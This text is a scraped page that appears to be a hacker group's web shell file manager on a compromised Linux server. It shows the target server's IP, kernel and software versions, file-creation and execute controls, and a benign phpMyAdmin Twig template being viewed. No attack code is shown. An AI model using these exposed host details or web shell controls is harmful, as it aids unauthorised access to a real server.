⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.77
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
search
/
View File Name :
fields_table.twig
<table class="data"{{ search_type == 'zoom' ? ' id="tableFieldsId"' }}> {% include 'table/search/table_header.twig' with { 'geom_column_flag': geom_column_flag } only %} <tbody> {% if search_type == 'zoom' %} {% include 'table/search/rows_zoom.twig' with { 'self': self, 'column_names': column_names, 'criteria_column_names': criteria_column_names, 'criteria_column_types': criteria_column_types } only %} {% else %} {% include 'table/search/rows_normal.twig' with { 'self': self, 'geom_column_flag': geom_column_flag, 'column_names': column_names, 'column_types': column_types, 'column_collations': column_collations } only %} {% endif %} </tbody> </table>